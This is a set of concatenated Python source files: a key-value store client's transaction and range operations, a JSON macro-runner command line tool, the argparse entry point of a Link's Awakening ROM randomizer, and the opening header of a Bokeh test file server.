if not all(is_condition(c) for c in conditions):
raise TypeError("conditions must be a sequence of Condition")
if not all(is_operation(o) for o in on_success):
raise TypeError("on_success must be a sequence of Operation")
if not all(is_operation(o) for o in on_failure):
raise TypeError("on_failure must be a sequence of Operation")
lk = {'GetRange': 'get_range',
'DeleteRange': 'delete_range',
'PutKey': 'put_key'}
def _build_req(op):
return _proto.OpRequest(**{lk[op._rpc]: op._build_operation()})
def _build_result(op, resp):
return op._build_result(getattr(resp, lk[op._rpc]))
req = _proto.TransactionRequest(
condition=[c._build_condition() for c in conditions],
on_success=[_build_req(o) for o in on_success],
on_failure=[_build_req(o) for o in on_failure])
resp = self._client._call('Transaction', req)
ops = on_success if resp.succeeded else on_failure
results = [_build_result(o, r) for (o, r) in zip(ops, resp.result)]
return TransactionResult(resp.succeeded, results)
def _next_key(prefix):
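# Compute an exclusive upper bound for a prefix scan: bumping the last byte
# makes [prefix, _next_key(prefix)) cover exactly the keys starting with
# ``prefix`` (this assumes the last byte of the encoding is not 0xff).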
b = bytearray(prefix.encode('utf-8'))
b[-1] += 1
return bytes(b).decode('utf-8')
def _register_op(return_type=None):
"""Register a key-value store operator"""
def inner(cls):
@_wraps(cls.__init__)
def method(self, *args, **kwargs):
return self._apply_op(cls(*args, **kwargs))
if cls.__doc__ is not None:
prefix = 'A request to '
assert cls.__doc__.startswith(prefix)
doc = cls.__doc__[len(prefix):].strip()
header, _, footer = doc.partition('\n\n')
header_words = header.split()
header_words[0] = header_words[0].capitalize()
header = '\n'.join(_textwrap.wrap(' '.join(header_words),
width=76,
initial_indent=" ",
subsequent_indent=" "))
if return_type:
returns = ("\n"
"\n"
" Returns\n"
" -------\n"
" %s" % return_type)
else:
returns = ""
method.__doc__ = "%s\n\n%s%s" % (header, footer, returns)
setattr(KeyValueStore, cls.__name__, method)
return cls
return inner
class comparison(Condition):
"""A comparison of the value or owner for a specified key.
Parameters
----------
key : str
The corresponding key.
field : {'value', 'owner'}
The field to compare on.
operator : {'==', '!=', '>', '>=', '<', '<='}
The comparison operator to use.
rhs : bytes, str or None
The right-hand-side of the condition expression.
Must be a ``bytes`` if ``field='value'``, or ``str`` or ``None`` if
``field='owner'``.
"""
__slots__ = ('_key', '_field', '_operator', '_rhs', '_rhs_proto')
_params = ('key', 'field', 'operator', 'rhs')
_operator_lk = {'==': 'EQUAL', '!=': 'NOT_EQUAL',
'<': 'LESS', '<=': 'LESS_EQUAL',
'>': 'GREATER', '>=': 'GREATER_EQUAL'}
def __init__(self, key, field, operator, rhs):
if not isinstance(key, str):
raise TypeError("key must be a string")
self._key = key
if field not in {'value', 'owner'}:
raise ValueError("field must be either 'value' or 'owner'")
self._field = field
if operator not in self._operator_lk:
raise ValueError("operator must be in {'==', '!=', '<', '>', "
"'<=', '>='}")
self._operator = operator
if field == 'owner':
if rhs is None:
if operator not in ('==', '!='):
raise TypeError("Comparison (owner(%r) %s None) is "
"unsupported" % (key, operator))
self._rhs_proto = self._rhs = None
elif isinstance(rhs, str):
self._rhs_proto = _container_instance_from_string(rhs)
self._rhs = rhs
else:
raise TypeError("rhs must be a string or None")
else:
if not isinstance(rhs, bytes):
raise TypeError("rhs must be bytes")
self._rhs_proto = self._rhs = rhs
key = property(lambda self: self._key)
field = property(lambda self: self._field)
operator = property(lambda self: self._operator)
rhs = property(lambda self: self._rhs)
def __repr__(self):
return '%s(%r) %s %r' % (self._field, self.key, self.operator, self.rhs)
def _build_condition(self):
kwargs = {'key': self.key,
'operator': self._operator_lk[self.operator],
'field': self.field.upper(),
self.field: self._rhs_proto}
return _proto.Condition(**kwargs)
class _ComparisonBuilder(_Base):
"""Base class for `value` and `owner`"""
__slots__ = ('_key',)
_params = ('key',)
def __init__(self, key):
if not isinstance(key, str):
raise TypeError("key must be a string")
self._key = key
key = property(lambda self: self._key)
_field = property(lambda self: type(self).__name__)
def __repr__(self):
return '%s(%r)' % (type(self).__name__, self.key)
def __eq__(self, other):
return comparison(self.key, self._field, '==', other)
def __ne__(self, other):
return comparison(self.key, self._field, '!=', other)
def __lt__(self, other):
return comparison(self.key, self._field, '<', other)
def __le__(self, other):
return comparison(self.key, self._field, '<=', other)
def __gt__(self, other):
return comparison(self.key, self._field, '>', other)
def __ge__(self, other):
return comparison(self.key, self._field, '>=', other)
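# e.g. ``value('k') == b'v'`` builds comparison('k', 'value', '==', b'v'),
# which can then be used as a transaction condition (illustrative).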
class value(_ComparisonBuilder):
"""Represents the value for a key, for use in transaction conditions.
Parameters
----------
key : str
The key to lookup
"""
pass
class owner(_ComparisonBuilder):
"""Represents the owner for a key, for use in transaction conditions.
Parameters
----------
key : str
The key to lookup
"""
pass
class _CountOrKeys(Operation):
"""Base class for count & keys"""
__slots__ = ()
_rpc = 'GetRange'
def __init__(self, start=None, end=None, prefix=None):
self.start = start
self.end = end
self.prefix = prefix
self._validate()
@property
def _is_prefix(self):
return self.prefix is not None
@property
def _is_range(self):
return self.start is not None or self.end is not None
def _validate(self):
self._check_is_type('start', str, nullable=True)
self._check_is_type('end', str, nullable=True)
self._check_is_type('prefix', str, nullable=True)
if self._is_prefix and self._is_range:
raise ValueError("Cannot specify `prefix` and `start`/`end`")
def __repr__(self):
typ = type(self).__name__
if self._is_prefix:
return '%s(prefix=%r)' % (typ, self.prefix)
return ('%s(start=%r, end=%r)'
% (typ, self.start, self.end))
def _build_operation(self):
self._validate()
if self._is_prefix:
return _proto.GetRangeRequest(start=self.prefix,
end=_next_key(self.prefix),
result_type=self._result_type)
return _proto.GetRangeRequest(start=self.start,
end=self.end,
result_type=self._result_type)
@_register_op('int')
class count(_CountOrKeys):
"""A request to count keys in the key-value store.
Parameters
----------
start : str, optional
The lower bound of the key range, inclusive. If not provided no
lower bound will be used.
end : str, optional
The upper bound of the key range, exclusive. If not provided, no
upper bound will be used.
prefix : str, optional
If provided, will count the number of keys matching this prefix.
"""
__slots__ = ('start', 'end', 'prefix')
_result_type = 'NONE'
def _build_result(self, result):
return result.count
@_register_op('list of keys')
class list_keys(_CountOrKeys):
"""A request to get a list of keys in the key-value store.
Parameters
----------
start : str, optional
The lower bound of the key range, inclusive. If not provided no
lower bound will be used.
end : str, optional
The upper bound of the key range, exclusive. If not provided, no
upper bound will be used.
prefix : str, optional
If provided, will return all keys matching this prefix.
"""
__slots__ = ('start', 'end', 'prefix')
_result_type = 'KEYS'
def _build_result(self, result):
return [kv.key for kv in result.result]
class _GetOrPop(Operation):
"""Base class for get & pop"""
__slots__ = ()
def __init__(self, key, default=None, return_owner=False):
self.key = key
self.default = default
self.return_owner = return_owner
self._validate()
def _validate(self):
self._check_is_type('key', str)
self._check_is_type('default', bytes, nullable=True)
self._check_is_type('return_owner', bool)
def __repr__(self):
return ('%s(%r, default=%r, return_owner=%r)'
% (type(self).__name__, self.key, self.default,
self.return_owner))
def _build_operation(self):
self._validate()
return self._proto(start=self.key,
end=self.key + '\x00',
result_type='ITEMS')
def _build_result(self, result):
if result.count == 0:
if self.return_owner:
return ValueOwnerPair(self.default, None)
return self.default
if self.return_owner:
return _value_owner_pair(result.result[0])
return result.result[0].value
@_register_op('bytes or ValueOwnerPair')
class get(_GetOrPop):
"""A request to get the value associated with a single key.
Parameters
----------
key : str
The key to get.
default : bytes or None, optional
Default value to return if the key is not present.
return_owner : bool, optional
If True, the owner will also be returned along with the value. Default
is False.
"""
__slots__ = ('key', 'default', 'return_owner')
_proto = _proto.GetRangeRequest
_rpc = 'GetRange'
@_register_op('bytes or ValueOwnerPair')
class pop(_GetOrPop):
"""A request to remove a single key and return its corresponding value.
Parameters
----------
key : str
The key to pop.
default : bytes or None, optional
Default value to return if the key is not present.
return_owner : bool, optional
If True, the owner will also be returned along with the value. Default
is False.
"""
__slots__ = ('key', 'default', 'return_owner')
_proto = _proto.DeleteRangeRequest
_rpc = 'DeleteRange'
def _output_to_ordered_dict(result, return_owner=False):
if return_owner:
return _OrderedDict((kv.key, _value_owner_pair(kv))
for kv in result.result)
return _OrderedDict((kv.key, kv.value) for kv in result.result)
class _GetOrPopPrefix(Operation):
"""Base class for (get/pop)_prefix"""
__slots__ = ()
def __init__(self, prefix, return_owner=False):
self.prefix = prefix
self.return_owner = return_owner
self._validate()
def _validate(self):
self._check_is_type('prefix', str)
self._check_is_type('return_owner', bool)
def __repr__(self):
return ('%s(%r, return_owner=%r)'
% (type(self).__name__, self.prefix, self.return_owner))
def _build_operation(self):
self._validate()
return self._proto(start=self.prefix,
end=_next_key(self.prefix),
result_type='ITEMS')
def _build_result(self, result):
return _output_to_ordered_dict(result, self.return_owner)
@_register_op('OrderedDict')
class get_prefix(_GetOrPopPrefix):
"""A request to get all key-value pairs whose keys start with ``prefix``.
Parameters
----------
prefix : str
The key prefix.
return_owner : bool, optional
If True, the owner will also be returned along with the value. Default
is False.
"""
__slots__ = ('prefix', 'return_owner')
_proto = _proto.GetRangeRequest
_rpc = 'GetRange'
@_register_op('OrderedDict')
class pop_prefix(_GetOrPopPrefix):
"""A request to remove all key-value pairs whose keys start with ``prefix``,
and return their corresponding values.
Parameters
----------
prefix : str
The key prefix.
return_owner : bool, optional
If True, the owner will also be returned along with the value. Default
is False.
"""
__slots__ = ('prefix', 'return_owner')
_proto = _proto.DeleteRangeRequest
_rpc = 'DeleteRange'
class _GetOrPopRange(Operation):
"""Base class for (get/pop)_prefix"""
__slots__ = ()
def __init__(self, start=None, end=None, return_owner=False):
self.start = start
self.end = end
self.return_owner = return_owner
self._validate()
def _validate(self):
self._check_is_type('start', str, nullable=True)
self._check_is_type('end', str, nullable=True)
self._check_is_type('return_owner', bool)
def __repr__(self):
return ('%s(start=%r, end=%r, return_owner=%r)'
% (type(self).__name__, self.start, self.end,
self.return_owner))
def _build_operation(self):
self._validate()
return self._proto(start=self.start,
end=self.end,
result_type='ITEMS')
def _build_result(self, result):
return _output_to_ordered_dict(result, self.return_owner)
@_register_op('OrderedDict')
class get_range(_GetOrPopRange):
"""A request to get a range of keys.
Parameters
----------
start : str, optional
The lower bound of the key range, inclusive. If not provided no lower
bound will be used.
end : str, optional
The upper bound of the key range, exclusive. If not provided, no upper
bound will be used.
return_owner : bool, optional
If True, the owner will also be returned along with the value. Default
is False.
"""
__slots__ = ('start', 'end', 'return_owner')
_proto = _proto.GetRangeRequest
_rpc = 'GetRange'
@_register_op('OrderedDict')
class pop_range(_GetOrPopRange):
"""A request to remove a range of keys and return their corresponding values.
Parameters
----------
start : str, optional
The lower bound of the key range, inclusive. If not provided no lower
bound will be used.
end : str, optional
The upper bound of the key range, exclusive. If not provided, no upper
bound will be used.
return_owner : bool, optional
If True, the owner will also be returned along with the value. Default
is False.
"""
__slots__ = ('start', 'end', 'return_owner')
_proto = _proto.DeleteRangeRequest
_rpc = 'DeleteRange'
class _ExistsMissingDiscard(Operation):
"""Base class for exists, missing & discard"""
__slots__ = ()
def __init__(self, key):
self.key = key
self._validate()
def _validate(self):
self._check_is_type('key', str)
def __repr__(self):
return '%s(%r)' % (type(self).__name__, self.key)
def _build_operation(self):
self._validate()
return self._proto(start=self.key,
end=self.key + '\x00',
result_type='NONE')
def _build_result(self, result):
return result.count == 1
@_register_op('bool')
class exists(_ExistsMissingDiscard, Condition):
"""A request to check if a key exists in the key-value store.
Parameters
----------
key : str
The key to check the presence of.
"""
__slots__ = ('key',)
_proto = _proto.GetRangeRequest
_rpc = 'GetRange'
def _build_condition(self):
self._validate()
return _proto.Condition(key=self.key,
operator='NOT_EQUAL',
field='VALUE',
value=None)
@_register_op('bool')
class missing(_ExistsMissingDiscard, Condition):
"""A request to check if a key is not in the key-value store.
This is the inverse of ``exists``.
Parameters
----------
key : str
The key to check the absence of.
"""
__slots__ = ('key',)
_proto = _proto.GetRangeRequest
_rpc = 'GetRange'
def _build_result(self, result):
return result.count == 0
def _build_condition(self):
self._validate()
return _proto.Condition(key=self.key,
operator='EQUAL',
field='VALUE',
value=None)
@_register_op('bool')
class discard(_ExistsMissingDiscard):
"""A request to discard a single key.
Returns true if the key was present, false otherwise.
Parameters
----------
key : str
The key to discard.
"""
__slots__ = ('key',)
_proto = _proto.DeleteRangeRequest
_rpc = 'DeleteRange'
def _build_discard_result(result, return_keys=False):
if return_keys:
return [kv.key for kv in result.result]
return result.count
@_register_op('int or list of keys')
class discard_prefix(Operation):
"""A request to discard all key-value pairs whose keys start with ``prefix``.
Returns either the number of keys discarded or a list of those keys,
depending on the value of ``return_keys``.
Parameters
----------
prefix : str
The key prefix.
return_keys : bool, optional
If True, the discarded keys will be returned instead of their count.
Default is False.
"""
__slots__ = ('prefix', 'return_keys')
_rpc = 'DeleteRange'
def __init__(self, prefix, return_keys=False):
self.prefix = prefix
self.return_keys = return_keys
self._validate()
def _validate(self):
self._check_is_type('prefix', str)
self._check_is_type('return_keys', bool)
def __repr__(self):
return ('discard_prefix(%r, return_keys=%r)' %
(self.prefix, self.return_keys))
def _build_operation(self):
self._validate()
result_type = 'KEYS' if self.return_keys else 'NONE'
return _proto.DeleteRangeRequest(start=self.prefix,
end=_next_key(self.prefix),
result_type=result_type)
def _build_result(self, result):
return _build_discard_result(result, self.return_keys)
@_register_op('int or list of keys')
class discard_range(Operation):
"""A request to discard a range of keys.
Returns either the number of keys discarded or a list of those keys,
depending on the value of ``return_keys``.
Parameters
----------
start : str, optional
The lower bound of the key range, inclusive. If not provided no lower
bound will be used.
end : str, optional
The upper bound of the key range, exclusive. If not provided, no upper
bound will be used.
return_keys : bool, optional
If True, the discarded keys will be returned instead of their count.
Default is False.
"""
__slots__ = ('start', 'end', 'return_keys')
_rpc = 'DeleteRange'
def __init__(self, start=None, end=None, return_keys=False):
self.start = start
self.end = end
self.return_keys = return_keys
self._validate()
def _validate(self):
self._check_is_type('start', str, nullable=True)
self._check_is_type('end', str, nullable=True)
self._check_is_type('return_keys', bool)
def __repr__(self):
return ('discard_range(start=%r, end=%r, return_keys=%r)'
% (self.start, self.end, self.return_keys))
def _build_operation(self):
self._validate()
result_type = 'KEYS' if self.return_keys else 'NONE'
return _proto.DeleteRangeRequest(start=self.start,
end=self.end,
result_type=result_type)
def _build_result(self, result):
return _build_discard_result(result, self.return_keys)
class _PutOrSwap(Operation):
"""Shared base class between put and swap"""
__slots__ = ()
_rpc = 'PutKey'
@property
def owner(self):
return self._owner
@owner.setter
def owner(self, owner):
if owner is _no_change:
self._owner_proto = None
self._owner = _no_change
elif owner is None:
self._owner_proto = self._owner = None
elif isinstance(owner, str):
# convert before storing the user-facing owner string, so the
# validity check runs before any state is mutated
self._owner_proto = _container_instance_from_string(owner)
self._owner = owner
else:
raise TypeError("owner must be a string or None")
def _validate(self):
self._check_is_type('key', str)
if self.value is _no_change and self.owner is _no_change:
raise ValueError("Must specify 'value', 'owner', or both")
if self.value is not _no_change:
self._check_is_type('value', bytes)
def _build_operation(self):
self._validate()
ignore_value = self.value is _no_change
value = None if ignore_value else self.value
ignore_owner = self.owner is _no_change
owner = self._owner_proto
return _proto.PutKeyRequest(key=self.key,
ignore_value=ignore_value,
value=value,
ignore_owner=ignore_owner,
owner=owner,
return_previous=self._return_previous)
@_register_op()
class put(_PutOrSwap):
"""A request to assign a value and/or owner for a single key.
Parameters
----------
key : str
The key to put.
value : bytes, optional
The value to put. Default is to leave value unchanged;
an error will be raised if the key doesn't exist.
owner : str or None, optional
The container id to claim ownership. Provide ``None`` to set to
no owner. Default is to leave value unchanged.
"""
__slots__ = ('key', 'value', '_owner', '_owner_proto')
_params = ('key', 'value', 'owner')
_return_previous = False
def __init__(self, key, value=_no_change, owner=_no_change):
self.key = key
self.value = value
self.owner = owner
self._validate()
def __repr__(self):
return ('put(%r, value=%r, owner=%r)'
% (self.key, self.value, self.owner))
def _build_result(self, result):
return None
@_register_op('bytes or ValueOwnerPair')
class swap(_PutOrSwap):
"""A request to assign a new value and/or owner for a single key, and
return the previous value.
Parameters
----------
key : str
The key to put.
value : bytes, optional
The value to put. Default is to leave value unchanged;
an error will be raised if the key doesn't exist.
owner : str or None, optional
The container id to claim ownership. Provide ``None`` to set to
no owner. Default is to leave value unchanged.
return_owner : bool, optional
If True, the owner will also be returned along with the value. Default
is False.
"""
__slots__ = ('key', 'value', 'return_owner', '_owner', '_owner_proto')
_params = ('key', 'value', 'owner', 'return_owner')
_return_previous = True
def __init__(self, key, value=_no_change, owner=_no_change,
return_owner=False):
self.key = key
self.value = value
self.owner = owner
self.return_owner = return_owner
self._validate()
def __repr__(self):
return ('swap(%r, value=%r, owner=%r, return_owner=%r)'
% (self.key, self.value, self.owner, self.return_owner))
def _build_result(self, result):
if result.HasField("previous"):
if self.return_owner:
return _value_owner_pair(result.previous)
return result.previous.value
return ValueOwnerPair(None, None) if self.return_owner else None
|
cli_main.py
|
from threading import Thread, Event
from copy import copy
import json
import queue
from Macro import SetNext, Elements, Bases, get_working_area
# Runs only in CLI mode, not in the GUI.
# The UI will be refactored on top of this CLI once it is complete.
test_loc = 'Sequence_Sample/discoveryI.json'
def loadJson(location: str):
if location is None:
raise FileNotFoundError('No Such File')
with open(location) as file:  # explicit closing is redundant in CPython, but needed on other implementations
baked = json.load(file)
return baked
class MacroCLI:
def __init__(self):
self.loaded = []
self.event = Event()
self.started = False
self.area = None
self.kill_key = 'f2'
self.thread_queue = queue.SimpleQueue()
self.base = Bases.Base.env_var
self.base.event = self.event
def clear_macro(self):
self.loaded.clear()
def set_env_variable(self):
area = get_working_area(self.event, self.kill_key)
self.base.screen_area = area
def load_macro(self, location=None):
self.clear_macro()
if location is None:
location = input()
try:
loaded = loadJson(location)
except FileNotFoundError:
print("└ No such file.")
except UnicodeDecodeError:
print("└ Unicode decode failed.")
except json.JSONDecodeError:
print("└ Failed decoding JSON.")
else:
# Deserializer may raise as well; consider wrapping it in its own try-except
deserialized = Elements.Deserializer(loaded)
self.loaded = deserialized
def list_macro(self, verbose=False):
if verbose:
for i in self.loaded:
print(i)
else:
for i in self.loaded:
print(i.name)
def stop_macro(self):
self.event.set()
def run_macro(self):
if not self.loaded:
print("[W] No macros loaded.")
return
self.set_env_variable()
running = copy(self.loaded)
SetNext(running)
thread = Thread(target=self._runThread, args=[running])
thread.start()
@staticmethod
def _runThread(seq):
head = seq[0]
for element in head:
element.run()
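# Minimal driver sketch (an assumption -- this module defines no entry point):
# load the sample sequence defined above and run it once.
if __name__ == '__main__':
    cli = MacroCLI()
    cli.load_macro(test_loc)
    cli.list_macro()
    cli.run_macro()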
|
main.py
|
import binascii
from romTables import ROMWithTables
import shlex
import randomizer
import logic
import spoilerLog
import re
from argparse import ArgumentParser, ArgumentTypeError
def goal(goal):
if goal == "random":
goal = "-1-8"
elif goal in ["seashells", "raft", "bingo", "bingo-full"]:
return goal
m = re.match(r'^(-?\d|open)(?:-(\d))?$', goal)
if not m:
raise ArgumentTypeError("'" + goal + "' is not valid: expected a number (open, 0, 1, 2 ... 8), a range (open-6, 1-4, 5-8, ...) or 'seashells' / 'raft'.")
start = m.group(1)
if start == "open":
start = "-1"
start = int(start)
end = m.group(2) or start
end = int(end)
if start < -1 or start > 8 or end < -1 or end > 8:
raise ArgumentTypeError("'" + goal + "' is not valid: expected a number (-1, 0, 1, 2 ... 8), a range (1-4, 5-8, ...) or 'seashells' / 'raft'.")
if end == start:
return start
elif end < start:
raise ArgumentTypeError("'" + goal + "' is not valid: expected a number (-1, 0, 1, 2 ... 8), a range (1-4, 5-8, ...) or 'seashells' / 'raft'.")
return range(start, end+1)
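# Illustrative parses for goal() as defined above:
#   goal("4")         -> 4
#   goal("open-6")    -> range(-1, 7)   ('open' maps to -1; the end is inclusive)
#   goal("random")    -> range(-1, 9)   (expands to "-1-8")
#   goal("seashells") -> "seashells"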
# Check if the current mix of options is valid, and fix incompatible selected options
def validateOptions(options):
def req(setting, value, message):
if getattr(options, setting) != value:
print("Warning: %s (setting adjusted automatically)" % message)
setattr(options, setting, value)
def dis(setting, value, new_value, message):
if getattr(options, setting) == value:
print("Warning: %s (setting adjusted automatically)" % message)
setattr(options, setting, new_value)
if options.goal in ("bingo", "bingo-full"):
req("overworld", "normal", "Bingo goal does not work with dungeondive")
req("accessibility_rule", "all", "Bingo goal needs 'all' accessibility")
dis("steal", "never", "default", "With bingo goal, stealing should be allowed")
dis("boss", "random", "shuffle", "With bingo goal, bosses need to be on normal or shuffle")
dis("miniboss", "random", "shuffle", "With bingo goal, minibosses need to be on normal or shuffle")
if options.overworld == "dungeondive":
dis("goal", "seashells", "8", "Dungeon dive does not work with seashell goal")
def main(mainargs=None):
import argparse
import sys
parser = argparse.ArgumentParser(description='Randomize!')
parser.add_argument('input_filename', metavar='input rom', type=str,
help="Rom file to use as input.")
parser.add_argument('-o', '--output', dest="output_filename", metavar='output rom', type=str, required=False,
help="Output filename to use. If not specified [seed].gbc is used.")
parser.add_argument('--dump', dest="dump", type=str, nargs="*",
help="Dump the logic of the given rom (spoilers!)")
parser.add_argument('--spoilerformat', dest="spoilerformat", choices=["none", "console", "text", "json"], default="none",
help="Sets the output format for the generated seed's spoiler log")
parser.add_argument('--spoilerfilename', dest="spoiler_filename", type=str, required=False,
help="Output filename to use for the spoiler log. If not specified, LADXR_[seed].txt/json is used.")
parser.add_argument('--test', dest="test", action="store_true",
help="Test the logic of the given rom, without showing anything.")
parser.add_argument('-s', '--seed', dest="seed", type=str, required=False,
help="Generate the specified seed")
parser.add_argument('--romdebugmode', dest="romdebugmode", action="store_true",
help="Patch the rom so that debug mode is enabled, this creates a default save with most items and unlocks some debug features.")
parser.add_argument('--exportmap', dest="exportmap", action="store_true",
help="Export the map (many graphical mistakes)")
parser.add_argument('--emptyplan', dest="emptyplan", type=str, required=False,
help="Write an unfilled plan file")
parser.add_argument('--timeout', type=float, required=False,
help="Timeout generating the seed after the specified number of seconds")
parser.add_argument('--logdirectory', dest="log_directory", type=str, required=False,
help="Directory to write the JSON log file. Generated independently from the spoiler log and omitted by default.")
# Flags that affect gameplay
parser.add_argument('--plan', dest="plan", metavar='plandomizer', type=str, required=False,
help="Read an item placement plan")
parser.add_argument('--race', dest="race", nargs="?", default=False, const=True,
help="Enable race mode. This generates a rom from which the spoiler log cannot be dumped and the seed cannot be extracted.")
parser.add_argument('--logic', dest="logic", choices=["casual", "normal", "hard", "glitched", "hell"],
help="Which level of logic is required.")
parser.add_argument('--multiworld', dest="multiworld", type=int, required=False,
help="Generates multiple roms for a multiworld setup.")
parser.add_argument('--multiworld-config', dest="multiworld_config", action="append", required=False,
help="Set configuration for a multiworld player, supply multiple times for settings per player")
parser.add_argument('--forwardfactor', dest="forwardfactor", type=float, required=False,
help="Forward item weight adjustment factor, lower values generate more rear heavy seeds while higher values generate front heavy seeds. Default is 0.5.")
parser.add_argument('--heartpiece', dest="heartpiece", action="store_true",
help="Enables randomization of heart pieces.")
parser.add_argument('--seashells', dest="seashells", action="store_true",
help="Enables seashells mode, which randomizes the secret sea shells hiding in the ground/trees. (chest are always randomized)")
parser.add_argument('--heartcontainers', dest="heartcontainers", action="store_true",
help="Enables heartcontainer mode, which randomizes the heart containers dropped by bosses.")
parser.add_argument('--instruments', dest="instruments", action="store_true",
help="Shuffle the instruments in the item pool.")
parser.add_argument('--owlstatues', dest="owlstatues", choices=['none', 'dungeon', 'overworld', 'both'], default='none',
help="Give the owl statues in dungeons or on the overworld items as well, instead of showing the normal hints")
parser.add_argument('--dungeon-items', dest="dungeon_items", choices=['standard', 'localkeys', 'localnightmarekey', 'smallkeys', 'keysanity', 'keysy'], default='standard',
help="Sets what gets done with dungeon items, if they are in their own dungeon or not.")
parser.add_argument('--randomstartlocation', dest="randomstartlocation", action="store_true",
help="Place your starting house at a random location.")
parser.add_argument('--dungeonshuffle', dest="dungeonshuffle", action="store_true",
help="Enable dungeon shuffle, puts dungeons on different spots.")
parser.add_argument('--entranceshuffle', dest="entranceshuffle", choices=["none", "simple", "advanced", "expert", "insanity"], default="none",
help="Enable entrance shuffle, shuffles around overworld entrances.")
parser.add_argument('--boss', dest="boss", choices=["default", "shuffle", "random"], default="default",
help="Enable boss shuffle, swaps around dungeon bosses.")
parser.add_argument('--miniboss', dest="miniboss", choices=["default", "shuffle", "random"], default="default",
help="Shuffle the minibosses or just randomize them.")
parser.add_argument('--doubletrouble', dest="doubletrouble", action="store_true",
help="Warning, bugged in various ways")
parser.add_argument('--witch', dest="witch", action="store_true",
help="Enables witch and toadstool in the item pool.")
parser.add_argument('--hpmode', dest="hpmode", choices=['default', 'inverted', '1', 'low', 'extralow'], default='default',
help="Set the HP gamplay mode. Inverted causes health containers to take HP instead of give it and you start with more health. 1 sets your starting health to just 1 hearth.")
parser.add_argument('--boomerang', dest="boomerang", choices=['default', 'trade', 'gift'], default='default',
help="Put the boomerang and the trade with the boomerang in the item pool")
parser.add_argument('--steal', dest="steal", choices=['never', 'always', 'default'], default='always',
help="Configure when to allow stealing from the shop.")
parser.add_argument('--hard-mode', dest="hardMode", choices=["none", "oracle", "hero", "ohko"], default="none",
help="Make the game a bit harder. [oracle] less health from drops, bombs damage yourself, and less iframes. [hero] Double damage, no heart/fairy drops. [ohko] One hit KO.")
parser.add_argument('--superweapons', dest="superweapons", action="store_true",
help="Make all weapons/inventory more powerful.")
parser.add_argument('--goal', dest="goal", type=goal, default='8',
help="Configure the instrument goal for this rom: any number between -1 (open egg) and 8, a range (e.g. 4-7), 'random', or 'raft' / 'seashells' / 'bingo' for special goals.")
parser.add_argument('--accessibility', dest="accessibility_rule", choices=['all', 'goal'],
help="Switches between making sure all locations are reachable or only the goal is reachable")
parser.add_argument('--bowwow', dest="bowwow", choices=['normal', 'always', 'swordless'], default='normal',
help="Enables 'good boy mode', where BowWow is allowed on all screens and can damage bosses and more enemies.")
parser.add_argument('--pool', dest="itempool", choices=['normal', 'casual', 'pain', 'keyup'], default='normal',
help="Sets up different item pools, for easier or harder gameplay.")
parser.add_argument('--overworld', dest="overworld", choices=['normal', 'dungeondive'], default='normal',
help="Allows switching to the dungeondive overworld, where there are only dungeons.")
parser.add_argument('--pymod', dest="pymod", action='append',
help="Load python code mods.")
# Just aesthetic flags
parser.add_argument('--gfxmod', dest="gfxmod", action='append',
help="Load graphical mods.")
parser.add_argument('--remove-flashing-lights', dest="removeFlashingLights", action="store_true",
help="Remove the flashing light effects from mamu, the shopkeeper and madbatter.")
parser.add_argument('--quickswap', dest="quickswap", choices=['none', 'a', 'b'], default='none',
help="Configure quickswap for A or B button (select key swaps, no longer opens map)")
parser.add_argument('--textmode', dest="textmode", choices=['default', 'fast', 'none'], default='default',
help="Default just keeps text normal, fast makes text appear twice as fast, and none removes all text from the game.")
parser.add_argument('--nag-messages', dest="removeNagMessages", action="store_false",
help="Enable the nag messages on touching stones and crystals. By default they are removed.")
parser.add_argument('--lowhpbeep', dest="lowhpbeep", choices=['default', 'slow', 'none'], default='slow',
help="Slows or disables the low health beeping sound")
parser.add_argument('--linkspalette', dest="linkspalette", type=int, default=None,
help="Force the palette of link")
parser.add_argument('--music', dest="music", choices=['default', 'random', 'off'], default='default',
help="Randomizes or disable the music")
args = parser.parse_args(mainargs)
validateOptions(args)
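# Multiworld: start each player from the shared args, then overlay any
# per-player --multiworld-config strings by re-parsing them on top of a
# copy of the base namespace.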
if args.multiworld is not None:
args.multiworld_options = [args] * args.multiworld
if args.multiworld_config is not None:
for index, settings_string in enumerate(args.multiworld_config):
args.multiworld_options[index] = parser.parse_args([args.input_filename] + shlex.split(settings_string),
namespace=argparse.Namespace(**vars(args)))
validateOptions(args.multiworld_options[index])
if args.timeout is not None:
import threading
import time
import os
def timeoutFunction():
time.sleep(args.timeout)
print("TIMEOUT")
sys.stdout.flush()
os._exit(1)
threading.Thread(target=timeoutFunction, daemon=True).start()
if args.exportmap:
import mapexport
print("Loading: %s" % (args.input_filename))
rom = ROMWithTables(args.input_filename)
mapexport.MapExport(rom)
sys.exit(0)
if args.emptyplan:
import locations.items
f = open(args.emptyplan, "wt")
f.write(";Plandomizer data\n;Items: %s\n" % (", ".join(map(lambda n: getattr(locations.items, n), filter(lambda n: not n.startswith("__"), dir(locations.items))))))
f.write(";Modify the item pool:\n")
f.write(";Pool:SWORD:+5\n")
f.write(";Pool:RUPEES_50:-5\n")
import worldSetup
iteminfo_list = logic.Logic(args, world_setup=worldSetup.WorldSetup()).iteminfo_list
for ii in sorted(iteminfo_list, key=lambda n: (n.location.dungeon if n.location.dungeon else -1, repr(n.metadata))):
if len(ii.OPTIONS) > 1:
f.write(";%r\n" % (ii.metadata))
f.write("Location:%s: \n" % (ii.nameId))
sys.exit(0)
if args.dump is not None or args.test:
print("Loading: %s" % (args.input_filename))
roms = [ROMWithTables(f) for f in [args.input_filename] + (args.dump or [])]
if args.spoilerformat == "none":
args.spoilerformat = "console"
try:
log = spoilerLog.SpoilerLog(args, roms)
log.output(args.spoiler_filename)
sys.exit(0)
except spoilerLog.RaceRomException:
print("Cannot read spoiler log for race rom")
sys.exit(1)
userSeed = None
if args.seed:
try:
userSeed = binascii.unhexlify(args.seed)
except binascii.Error:
userSeed = args.seed.encode("ascii")
retry_count = 0
while True:
try:
r = randomizer.Randomizer(args, seed=userSeed)
seed = binascii.hexlify(r.seed).decode("ascii").upper()
break
except randomizer.Error:
if userSeed is not None:
print("Specified seed does not produce a valid result.")
sys.exit(1)
retry_count += 1
if retry_count > 100:
print("Randomization keeps failing, abort!")
sys.exit(1)
print("Failed, trying again: %d" % (retry_count))
print("Seed: %s" % (seed))
if __name__ == "__main__":
main()
|
file_server.py
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Define a simple web server for testing purposes.
Used to serve the testing html pages that are needed by the webdriver unit
tests.
'''
#-----------------------------------------------------------------------------
# Boilerplate
